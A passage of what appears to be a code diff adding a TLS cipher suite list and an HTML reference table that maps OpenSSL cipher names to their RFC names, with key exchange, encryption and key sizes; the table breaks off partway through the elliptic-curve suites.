0xC0A1 TLS_RSA_WITH_AES_256_CCM_8
|
||||
0xC0A2 TLS_DHE_RSA_WITH_AES_128_CCM_8
|
||||
0xC0A3 TLS_DHE_RSA_WITH_AES_256_CCM_8
|
||||
0xC0A4 TLS_PSK_WITH_AES_128_CCM
|
||||
0xC0A5 TLS_PSK_WITH_AES_256_CCM
|
||||
0xC0A6 TLS_DHE_PSK_WITH_AES_128_CCM
|
||||
0xC0A7 TLS_DHE_PSK_WITH_AES_256_CCM
|
||||
0xC0A8 TLS_PSK_WITH_AES_128_CCM_8
|
||||
0xC0A9 TLS_PSK_WITH_AES_256_CCM_8
|
||||
0xC0AA TLS_PSK_DHE_WITH_AES_128_CCM_8
|
||||
0xC0AB TLS_PSK_DHE_WITH_AES_256_CCM_80
|
||||
0xC0AC TLS_ECDHE_ECDSA_WITH_AES_128_CCM
|
||||
0xC0AD TLS_ECDHE_ECDSA_WITH_AES_256_CCM
|
||||
0xC0AE TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8
|
||||
0xC0AF TLS_ECDHE_ECDSA_WITH_AES_256_CCM_8
|
||||
0xCC13 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
|
||||
0xCC14 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
|
||||
0xCC15 TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256
|
||||
0xFEFE SSL_RSA_FIPS_WITH_DES_CBC_SHA
|
||||
0xFEFE SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
|
||||
0xFFE0 SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
|
||||
0xFFE1 SSL_RSA_FIPS_WITH_DES_CBC_SHA
|
|
@ -0,0 +1,192 @@
|
|||
<html>
|
||||
<head>
|
||||
<title>Mapping OpenSSL sipher suite names to RFC names</title>
|
||||
</head>
|
||||
<style type="text/css">
|
||||
.mytable { background-color:#eee;border-collapse:collapse; text-align:left; table-layout: fixed; width:1000px; }
|
||||
.mytable th { padding:3px; border:1px solid #000; background-color:#888 ;color:white ;width:50%; font-family:Helvetica; overflow: hidden; }
|
||||
.mytable td { padding:3px; border:1px solid #888; empty-cells:hide; font-family:Helvetica; font-size:80%; overflow: hidden; }
|
||||
</style>
|
||||
<body>
|
||||
<br>
|
||||
<table class="mytable">
|
||||
<col width="8%" />
|
||||
<col width="26%" />
|
||||
<col width="10%" />
|
||||
<col width="9%" />
|
||||
<col width="8%" />
|
||||
<col width="39%" />
|
||||
<tr><th>Cipher Suite</th><th> Name (OpenSSL)</th><th> KeyExch. </th><th> Encryption </th><th> Bits </th><th>Cipher Suite Name (RFC)</th></tr>
|
||||
<tr><td> [0x00]</td><td> NULL-MD5 </td><td> RSA(512) </td><td> None </td><td> None, export </td><td> TLS_NULL_WITH_NULL_NULL </td></tr>
|
||||
<tr><td> [0x01]</td><td> NULL-MD5 </td><td> RSA </td><td> None </td><td> None </td><td> TLS_RSA_WITH_NULL_MD5 </td></tr>
|
||||
<tr><td> [0x02]</td><td> NULL-SHA </td><td> RSA </td><td> None </td><td> None </td><td> TLS_RSA_WITH_NULL_SHA </td></tr>
|
||||
<tr><td> [0x03]</td><td> EXP-RC4-MD5 </td><td> RSA(512) </td><td> RC4 </td><td> 40, export </td><td> TLS_RSA_EXPORT_WITH_RC4_40_MD5 </td></tr>
|
||||
<tr><td> [0x04]</td><td> RC4-MD5 </td><td> RSA </td><td> RC4 </td><td> 128 </td><td> TLS_RSA_WITH_RC4_128_MD5 </td></tr>
|
||||
<tr><td> [0x05]</td><td> RC4-SHA </td><td> RSA </td><td> RC4 </td><td> 128 </td><td> TLS_RSA_WITH_RC4_128_SHA </td></tr>
|
||||
<tr><td> [0x06]</td><td> EXP-RC2-CBC-MD5 </td><td> RSA(512) </td><td> RC2 </td><td> 40, export </td><td> TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 </td></tr>
|
||||
<tr><td> [0x07]</td><td> IDEA-CBC-SHA </td><td> RSA </td><td> IDEA </td><td> 128 </td><td> TLS_RSA_WITH_IDEA_CBC_SHA </td></tr>
|
||||
<tr><td> [0x08]</td><td> EXP-DES-CBC-SHA </td><td> RSA(512) </td><td> DES </td><td> 40, export </td><td> TLS_RSA_EXPORT_WITH_DES40_CBC_SHA </td></tr>
|
||||
<tr><td> [0x09]</td><td> DES-CBC-SHA </td><td> RSA </td><td> DES </td><td> 56 </td><td> TLS_RSA_WITH_DES_CBC_SHA </td></tr>
|
||||
<tr><td> [0x0a]</td><td> DES-CBC3-SHA </td><td> RSA </td><td> 3DES </td><td> 168 </td><td> TLS_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0x0b]</td><td> EXP-DH-DSS-DES-CBC-SHA </td><td> DH/DSS </td><td> DES </td><td> 40, export </td><td> TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA </td></tr>
|
||||
<tr><td> [0x0c]</td><td> DH-DSS-DES-CBC-SHA </td><td> DH/DSS </td><td> DES </td><td> 56 </td><td> TLS_DH_DSS_WITH_DES_CBC_SHA </td></tr>
|
||||
<tr><td> [0x0d]</td><td> DH-DSS-DES-CBC3-SHA </td><td> DH/DSS </td><td> 3DES </td><td> 168 </td><td> TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0x0e]</td><td> EXP-DH-RSA-DES-CBC-SHA </td><td> DH/RSA </td><td> DES </td><td> 40, export </td><td> TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA </td></tr>
|
||||
<tr><td> [0x0f]</td><td> DH-RSA-DES-CBC-SHA </td><td> DH/RSA </td><td> DES </td><td> 56 </td><td> TLS_DH_RSA_WITH_DES_CBC_SHA </td></tr>
|
||||
<tr><td> [0x10]</td><td> DH-RSA-DES-CBC3-SHA </td><td> DH/RSA </td><td> 3DES </td><td> 168 </td><td> TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0x11]</td><td> EXP-EDH-DSS-DES-CBC-SHA </td><td> DH(512) </td><td> DES </td><td> 40, export </td><td> TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA </td></tr>
|
||||
<tr><td> [0x12]</td><td> EDH-DSS-DES-CBC-SHA </td><td> DH </td><td> DES </td><td> 56 </td><td> TLS_DHE_DSS_WITH_DES_CBC_SHA </td></tr>
|
||||
<tr><td> [0x13]</td><td> EDH-DSS-DES-CBC3-SHA </td><td> DH </td><td> 3DES </td><td> 168 </td><td> TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0x14]</td><td> EXP-EDH-RSA-DES-CBC-SHA </td><td> DH(512) </td><td> DES </td><td> 40, export </td><td> TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA </td></tr>
|
||||
<tr><td> [0x15]</td><td> EDH-RSA-DES-CBC-SHA </td><td> DH </td><td> DES </td><td> 56 </td><td> TLS_DHE_RSA_WITH_DES_CBC_SHA </td></tr>
|
||||
<tr><td> [0x16]</td><td> EDH-RSA-DES-CBC3-SHA </td><td> DH </td><td> 3DES </td><td> 168 </td><td> TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0x17]</td><td> EXP-ADH-RC4-MD5 </td><td> DH(512) </td><td> RC4 </td><td> 40, export </td><td> TLS_DH_anon_EXPORT_WITH_RC4_40_MD5 </td></tr>
|
||||
<tr><td> [0x18]</td><td> ADH-RC4-MD5 </td><td> DH </td><td> RC4 </td><td> 128 </td><td> TLS_DH_anon_WITH_RC4_128_MD5 </td></tr>
|
||||
<tr><td> [0x19]</td><td> EXP-ADH-DES-CBC-SHA </td><td> DH(512) </td><td> DES </td><td> 40, export </td><td> TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA </td></tr>
|
||||
<tr><td> [0x1a]</td><td> ADH-DES-CBC-SHA </td><td> DH </td><td> DES </td><td> 56 </td><td> TLS_DH_anon_WITH_DES_CBC_SHA </td></tr>
|
||||
<tr><td> [0x1b]</td><td> ADH-DES-CBC3-SHA </td><td> DH </td><td> 3DES </td><td> 168 </td><td> TLS_DH_anon_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0x1e]</td><td> KRB5-DES-CBC-SHA </td><td> KRB5 </td><td> DES </td><td> 56 </td><td> TLS_KRB5_WITH_DES_CBC_SHA </td></tr>
|
||||
<tr><td> [0x1f]</td><td> KRB5-DES-CBC3-SHA </td><td> KRB5 </td><td> 3DES </td><td> 168 </td><td> TLS_KRB5_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0x20]</td><td> KRB5-RC4-SHA </td><td> KRB5 </td><td> RC4 </td><td> 128 </td><td> TLS_KRB5_WITH_RC4_128_SHA </td></tr>
|
||||
<tr><td> [0x21]</td><td> KRB5-IDEA-CBC-SHA </td><td> KRB5 </td><td> IDEA </td><td> 128 </td><td> TLS_KRB5_WITH_IDEA_CBC_SHA </td></tr>
|
||||
<tr><td> [0x22]</td><td> KRB5-DES-CBC-MD5 </td><td> KRB5 </td><td> DES </td><td> 56 </td><td> TLS_KRB5_WITH_DES_CBC_MD5 </td></tr>
|
||||
<tr><td> [0x23]</td><td> KRB5-DES-CBC3-MD5 </td><td> KRB5 </td><td> 3DES </td><td> 168 </td><td> TLS_KRB5_WITH_3DES_EDE_CBC_MD5 </td></tr>
|
||||
<tr><td> [0x24]</td><td> KRB5-RC4-MD5 </td><td> KRB5 </td><td> RC4 </td><td> 128 </td><td> TLS_KRB5_WITH_RC4_128_MD5 </td></tr>
|
||||
<tr><td> [0x25]</td><td> KRB5-IDEA-CBC-MD5 </td><td> KRB5 </td><td> IDEA </td><td> 128 </td><td> TLS_KRB5_WITH_IDEA_CBC_MD5 </td></tr>
|
||||
<tr><td> [0x26]</td><td> EXP-KRB5-DES-CBC-SHA </td><td> KRB5 </td><td> DES </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA </td></tr>
|
||||
<tr><td> [0x27]</td><td> EXP-KRB5-RC2-CBC-SHA </td><td> KRB5 </td><td> RC2 </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA </td></tr>
|
||||
<tr><td> [0x28]</td><td> EXP-KRB5-RC4-SHA </td><td> KRB5 </td><td> RC4 </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_RC4_40_SHA </td></tr>
|
||||
<tr><td> [0x29]</td><td> EXP-KRB5-DES-CBC-MD5 </td><td> KRB5 </td><td> DES </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5 </td></tr>
|
||||
<tr><td> [0x2a]</td><td> EXP-KRB5-RC2-CBC-MD5 </td><td> KRB5 </td><td> RC2 </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5 </td></tr>
|
||||
<tr><td> [0x2b]</td><td> EXP-KRB5-RC4-MD5 </td><td> KRB5 </td><td> RC4 </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_RC4_40_MD5 </td></tr>
|
||||
<tr><td> [0x2f]</td><td> AES128-SHA </td><td> RSA </td><td> AES </td><td> 128 </td><td> TLS_RSA_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x30]</td><td> DH-DSS-AES128-SHA </td><td> DH/DSS </td><td> AES </td><td> 128 </td><td> TLS_DH_DSS_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x31]</td><td> DH-RSA-AES128-SHA </td><td> DH/RSA </td><td> AES </td><td> 128 </td><td> TLS_DH_RSA_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x32]</td><td> DHE-DSS-AES128-SHA </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DHE_DSS_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x33]</td><td> DHE-RSA-AES128-SHA </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DHE_RSA_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x34]</td><td> ADH-AES128-SHA </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DH_anon_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x35]</td><td> AES256-SHA </td><td> RSA </td><td> AES </td><td> 256 </td><td> TLS_RSA_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x36]</td><td> DH-DSS-AES256-SHA </td><td> DH/DSS </td><td> AES </td><td> 256 </td><td> TLS_DH_DSS_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x37]</td><td> DH-RSA-AES256-SHA </td><td> DH/RSA </td><td> AES </td><td> 256 </td><td> TLS_DH_RSA_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x38]</td><td> DHE-DSS-AES256-SHA </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DHE_DSS_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x39]</td><td> DHE-RSA-AES256-SHA </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DHE_RSA_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x3a]</td><td> ADH-AES256-SHA </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DH_anon_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x3b]</td><td> NULL-SHA256 </td><td> RSA </td><td> None </td><td> None </td><td> TLS_RSA_WITH_NULL_SHA256 </td></tr>
|
||||
<tr><td> [0x3c]</td><td> AES128-SHA256 </td><td> RSA </td><td> AES </td><td> 128 </td><td> TLS_RSA_WITH_AES_128_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x3d]</td><td> AES256-SHA256 </td><td> RSA </td><td> AES </td><td> 256 </td><td> TLS_RSA_WITH_AES_256_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x3e]</td><td> DH-DSS-AES128-SHA256 </td><td> DH/DSS </td><td> AES </td><td> 128 </td><td> TLS_DH_DSS_WITH_AES_128_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x3f]</td><td> DH-RSA-AES128-SHA256 </td><td> DH/RSA </td><td> AES </td><td> 128 </td><td> TLS_DH_RSA_WITH_AES_128_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x40]</td><td> DHE-DSS-AES128-SHA256 </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x41]</td><td> CAMELLIA128-SHA </td><td> RSA </td><td> Camellia</td><td> 128 </td><td> TLS_RSA_WITH_CAMELLIA_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x42]</td><td> DH-DSS-CAMELLIA128-SHA </td><td> DH/DSS </td><td> Camellia</td><td> 128 </td><td> TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x43]</td><td> DH-RSA-CAMELLIA128-SHA </td><td> DH/RSA </td><td> Camellia</td><td> 128 </td><td> TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x44]</td><td> DHE-DSS-CAMELLIA128-SHA </td><td> DH </td><td> Camellia</td><td> 128 </td><td> TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x45]</td><td> DHE-RSA-CAMELLIA128-SHA </td><td> DH </td><td> Camellia</td><td> 128 </td><td> TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x46]</td><td> ADH-CAMELLIA128-SHA </td><td> DH </td><td> Camellia</td><td> 128 </td><td> TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x62]</td><td> EXP1024-DES-CBC-SHA </td><td> RSA(1024)</td><td> DES </td><td> 56, export </td><td> TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA</td></tr>
|
||||
<tr><td> [0x63]</td><td> EXP1024-DHE-DSS-DES-CBC-SHA </td><td> DH(1024) </td><td> DES </td><td> 56, export </td><td> TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA</td></tr>
|
||||
<tr><td> [0x64]</td><td> EXP1024-RC4-SHA </td><td> RSA(1024)</td><td> RC4 </td><td> 56, export </td><td> TLS_RSA_EXPORT1024_WITH_RC4_56_SHA</td></tr>
|
||||
<tr><td> [0x65]</td><td> EXP1024-DHE-DSS-RC4-SHA </td><td> DH(1024) </td><td> RC4 </td><td> 56, export </td><td> TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA</td></tr>
|
||||
<tr><td> [0x66]</td><td> DHE-DSS-RC4-SHA </td><td> DH </td><td> RC4 </td><td> 128 </td><td> TLS_DHE_DSS_WITH_RC4_128_SHA</td></tr>
|
||||
<tr><td> [0x67]</td><td> DHE-RSA-AES128-SHA256 </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x68]</td><td> DH-DSS-AES256-SHA256 </td><td> DH/DSS </td><td> AES </td><td> 256 </td><td> TLS_DH_DSS_WITH_AES_256_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x69]</td><td> DH-RSA-AES256-SHA256 </td><td> DH/RSA </td><td> AES </td><td> 256 </td><td> TLS_DH_RSA_WITH_AES_256_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x6a]</td><td> DHE-DSS-AES256-SHA256 </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DHE_DSS_WITH_AES_256_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x6b]</td><td> DHE-RSA-AES256-SHA256 </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x6c]</td><td> ADH-AES128-SHA256 </td><td> DH </td><td> AES </td><td> 128 </td><td> TLS_DH_anon_WITH_AES_128_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x6d]</td><td> ADH-AES256-SHA256 </td><td> DH </td><td> AES </td><td> 256 </td><td> TLS_DH_anon_WITH_AES_256_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0x80]</td><td> GOST94-GOST89-GOST89 </td><td> unknown </td><td> unknown </td><td> unknown </td><td> TLS_GOSTR341094_WITH_28147_CNT_IMIT </td></tr>
|
||||
<tr><td> [0x81]</td><td> GOST2001-GOST89-GOST89 </td><td> unknown </td><td> unknown </td><td> unknown </td><td> TLS_GOSTR341001_WITH_28147_CNT_IMIT</td></tr>
|
||||
<tr><td> [0x84]</td><td> CAMELLIA256-SHA </td><td> RSA </td><td> Camellia</td><td> 256 </td><td> TLS_RSA_WITH_CAMELLIA_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x85]</td><td> DH-DSS-CAMELLIA256-SHA </td><td> DH/DSS </td><td> Camellia</td><td> 256 </td><td> TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x86]</td><td> DH-RSA-CAMELLIA256-SHA </td><td> DH/RSA </td><td> Camellia</td><td> 256 </td><td> TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x87]</td><td> DHE-DSS-CAMELLIA256-SHA </td><td> DH </td><td> Camellia</td><td> 256 </td><td> TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x88]</td><td> DHE-RSA-CAMELLIA256-SHA </td><td> DH </td><td> Camellia</td><td> 256 </td><td> TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x89]</td><td> ADH-CAMELLIA256-SHA </td><td> DH </td><td> Camellia</td><td> 256 </td><td> TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x8a]</td><td> PSK-RC4-SHA </td><td> PSK </td><td> RC4 </td><td> 128 </td><td> TLS_PSK_WITH_RC4_128_SHA </td></tr>
|
||||
<tr><td> [0x8b]</td><td> PSK-3DES-EDE-CBC-SHA </td><td> PSK </td><td> 3DES </td><td> 168 </td><td> TLS_PSK_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0x8c]</td><td> PSK-AES128-CBC-SHA </td><td> PSK </td><td> AES </td><td> 128 </td><td> TLS_PSK_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0x8d]</td><td> PSK-AES256-CBC-SHA </td><td> PSK </td><td> AES </td><td> 256 </td><td> TLS_PSK_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0x96]</td><td> SEED-SHA </td><td> RSA </td><td> SEED </td><td> 128 </td><td> TLS_RSA_WITH_SEED_CBC_SHA </td></tr>
|
||||
<tr><td> [0x97]</td><td> DH-DSS-SEED-SHA </td><td> DH/DSS </td><td> SEED </td><td> 128 </td><td> TLS_DH_DSS_WITH_SEED_CBC_SHA </td></tr>
|
||||
<tr><td> [0x98]</td><td> DH-RSA-SEED-SHA </td><td> DH/RSA </td><td> SEED </td><td> 128 </td><td> TLS_DH_RSA_WITH_SEED_CBC_SHA </td></tr>
|
||||
<tr><td> [0x99]</td><td> DHE-DSS-SEED-SHA </td><td> DH </td><td> SEED </td><td> 128 </td><td> TLS_DHE_DSS_WITH_SEED_CBC_SHA </td></tr>
|
||||
<tr><td> [0x9a]</td><td> DHE-RSA-SEED-SHA </td><td> DH </td><td> SEED </td><td> 128 </td><td> TLS_DHE_RSA_WITH_SEED_CBC_SHA </td></tr>
|
||||
<tr><td> [0x9b]</td><td> ADH-SEED-SHA </td><td> DH </td><td> SEED </td><td> 128 </td><td> TLS_DH_anon_WITH_SEED_CBC_SHA </td></tr>
|
||||
<tr><td> [0x9c]</td><td> AES128-GCM-SHA256 </td><td> RSA </td><td> AESGCM </td><td> 128 </td><td> TLS_RSA_WITH_AES_128_GCM_SHA256 </td></tr>
|
||||
<tr><td> [0x9d]</td><td> AES256-GCM-SHA384 </td><td> RSA </td><td> AESGCM </td><td> 256 </td><td> TLS_RSA_WITH_AES_256_GCM_SHA384 </td></tr>
|
||||
<tr><td> [0x9e]</td><td> DHE-RSA-AES128-GCM-SHA256 </td><td> DH </td><td> AESGCM </td><td> 128 </td><td> TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 </td></tr>
|
||||
<tr><td> [0x9f]</td><td> DHE-RSA-AES256-GCM-SHA384 </td><td> DH </td><td> AESGCM </td><td> 256 </td><td> TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 </td></tr>
|
||||
<tr><td> [0xa0]</td><td> DH-RSA-AES128-GCM-SHA256 </td><td> DH/RSA </td><td> AESGCM </td><td> 128 </td><td> TLS_DH_RSA_WITH_AES_128_GCM_SHA256 </td></tr>
|
||||
<tr><td> [0xa1]</td><td> DH-RSA-AES256-GCM-SHA384 </td><td> DH/RSA </td><td> AESGCM </td><td> 256 </td><td> TLS_DH_RSA_WITH_AES_256_GCM_SHA384 </td></tr>
|
||||
<tr><td> [0xa2]</td><td> DHE-DSS-AES128-GCM-SHA256 </td><td> DH </td><td> AESGCM </td><td> 128 </td><td> TLS_DHE_DSS_WITH_AES_128_GCM_SHA256 </td></tr>
|
||||
<tr><td> [0xa3]</td><td> DHE-DSS-AES256-GCM-SHA384 </td><td> DH </td><td> AESGCM </td><td> 256 </td><td> TLS_DHE_DSS_WITH_AES_256_GCM_SHA384 </td></tr>
|
||||
<tr><td> [0xa4]</td><td> DH-DSS-AES128-GCM-SHA256 </td><td> DH/DSS </td><td> AESGCM </td><td> 128 </td><td> TLS_DH_DSS_WITH_AES_128_GCM_SHA256 </td></tr>
|
||||
<tr><td> [0xa5]</td><td> DH-DSS-AES256-GCM-SHA384 </td><td> DH/DSS </td><td> AESGCM </td><td> 256 </td><td> TLS_DH_DSS_WITH_AES_256_GCM_SHA384 </td></tr>
|
||||
<tr><td> [0xa6]</td><td> ADH-AES128-GCM-SHA256 </td><td> DH </td><td> AESGCM </td><td> 128 </td><td> TLS_DH_anon_WITH_AES_128_GCM_SHA256 </td></tr>
|
||||
<tr><td> [0xa7]</td><td> ADH-AES256-GCM-SHA384 </td><td> DH </td><td> AESGCM </td><td> 256 </td><td> TLS_DH_anon_WITH_AES_256_GCM_SHA384 </td></tr>
|
||||
<tr><td> [0xc001]</td><td> ECDH-ECDSA-NULL-SHA </td><td> ECDH/ECDSA</td><td> None </td><td> None </td><td> TLS_ECDH_ECDSA_WITH_NULL_SHA </td></tr>
|
||||
<tr><td> [0xc002]</td><td> ECDH-ECDSA-RC4-SHA </td><td> ECDH/ECDSA</td><td> RC4 </td><td> 128 </td><td> TLS_ECDH_ECDSA_WITH_RC4_128_SHA </td></tr>
|
||||
<tr><td> [0xc003]</td><td> ECDH-ECDSA-DES-CBC3-SHA </td><td> ECDH/ECDSA</td><td> 3DES </td><td> 168 </td><td> TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc004]</td><td> ECDH-ECDSA-AES128-SHA </td><td> ECDH/ECDSA</td><td> AES </td><td> 128 </td><td> TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc005]</td><td> ECDH-ECDSA-AES256-SHA </td><td> ECDH/ECDSA</td><td> AES </td><td> 256 </td><td> TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc006]</td><td> ECDHE-ECDSA-NULL-SHA </td><td> ECDH </td><td> None </td><td> None </td><td> TLS_ECDHE_ECDSA_WITH_NULL_SHA </td></tr>
|
||||
<tr><td> [0xc007]</td><td> ECDHE-ECDSA-RC4-SHA </td><td> ECDH </td><td> RC4 </td><td> 128 </td><td> TLS_ECDHE_ECDSA_WITH_RC4_128_SHA </td></tr>
|
||||
<tr><td> [0xc008]</td><td> ECDHE-ECDSA-DES-CBC3-SHA </td><td> ECDH </td><td> 3DES </td><td> 168 </td><td> TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc009]</td><td> ECDHE-ECDSA-AES128-SHA </td><td> ECDH </td><td> AES </td><td> 128 </td><td> TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc00a]</td><td> ECDHE-ECDSA-AES256-SHA </td><td> ECDH </td><td> AES </td><td> 256 </td><td> TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc00b]</td><td> ECDH-RSA-NULL-SHA </td><td> ECDH/RSA </td><td> None </td><td> None </td><td> TLS_ECDH_RSA_WITH_NULL_SHA </td></tr>
|
||||
<tr><td> [0xc00c]</td><td> ECDH-RSA-RC4-SHA </td><td> ECDH/RSA </td><td> RC4 </td><td> 128 </td><td> TLS_ECDH_RSA_WITH_RC4_128_SHA </td></tr>
|
||||
<tr><td> [0xc00d]</td><td> ECDH-RSA-DES-CBC3-SHA </td><td> ECDH/RSA </td><td> 3DES </td><td> 168 </td><td> TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc00e]</td><td> ECDH-RSA-AES128-SHA </td><td> ECDH/RSA </td><td> AES </td><td> 128 </td><td> TLS_ECDH_RSA_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc00f]</td><td> ECDH-RSA-AES256-SHA </td><td> ECDH/RSA </td><td> AES </td><td> 256 </td><td> TLS_ECDH_RSA_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc010]</td><td> ECDHE-RSA-NULL-SHA </td><td> ECDH </td><td> None </td><td> None </td><td> TLS_ECDHE_RSA_WITH_NULL_SHA </td></tr>
|
||||
<tr><td> [0xc011]</td><td> ECDHE-RSA-RC4-SHA </td><td> ECDH </td><td> RC4 </td><td> 128 </td><td> TLS_ECDHE_RSA_WITH_RC4_128_SHA </td></tr>
|
||||
<tr><td> [0xc012]</td><td> ECDHE-RSA-DES-CBC3-SHA </td><td> ECDH </td><td> 3DES </td><td> 168 </td><td> TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc013]</td><td> ECDHE-RSA-AES128-SHA </td><td> ECDH </td><td> AES </td><td> 128 </td><td> TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc014]</td><td> ECDHE-RSA-AES256-SHA </td><td> ECDH </td><td> AES </td><td> 256 </td><td> TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc015]</td><td> AECDH-NULL-SHA </td><td> ECDH </td><td> None </td><td> None </td><td> TLS_ECDH_anon_WITH_NULL_SHA </td></tr>
|
||||
<tr><td> [0xc016]</td><td> AECDH-RC4-SHA </td><td> ECDH </td><td> RC4 </td><td> 128 </td><td> TLS_ECDH_anon_WITH_RC4_128_SHA </td></tr>
|
||||
<tr><td> [0xc017]</td><td> AECDH-DES-CBC3-SHA </td><td> ECDH </td><td> 3DES </td><td> 168 </td><td> TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc018]</td><td> AECDH-AES128-SHA </td><td> ECDH </td><td> AES </td><td> 128 </td><td> TLS_ECDH_anon_WITH_AES_128_CBC_SHA </td></tr>
|
||||
